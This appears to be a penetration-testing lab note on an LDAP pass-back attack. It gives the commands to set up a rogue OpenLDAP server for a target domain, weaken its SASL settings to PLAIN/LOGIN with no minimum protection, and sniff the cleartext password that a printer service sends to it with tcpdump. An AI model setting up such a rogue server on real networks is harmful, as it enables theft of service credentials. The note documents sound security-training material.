Rogue LDAP Server

sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd

  • Omit initial configuration?: No

  • DNS domain name: target domain

  • Organization name: target domain

  • Administrator password: anything, but remember it

  • Database removed?: No

  • Move old database?: Yes

Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.

Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms. We want to ensure that our LDAP server only supports PLAIN and LOGIN authentication methods. To do this, we need to create a new ldif file, called with the following content:

cat ./olcSaslSecProps.ldif
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

  • olcSaslSecProps: Specifies the SASL security properties

  • noanonymous: Disables mechanisms that support anonymous login

  • minssf: Specifies the minimum acceptable security strength with 0, meaning no protection.

Update configuration

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify configuration

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

We have our LDAP server running under the 389 port.

Capturing LDAP Credentials

sudo tcpdump -SX -i breachad tcp port 389
   -S
   --absolute-tcp-sequence-numbers
          Print absolute, rather than relative, TCP sequence numbers.
          
   -X     When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and  ASCII.
          This is very handy for analysing new protocols.  In the current implementation this flag may have the same effect as -XX if the packet is truncated.

And we are able to retrieve the plain text password used for the Printer Service against LDAP.

PreviousLDAP Pass-backNextLLNMR, NTB-NS & WPAD

Last updated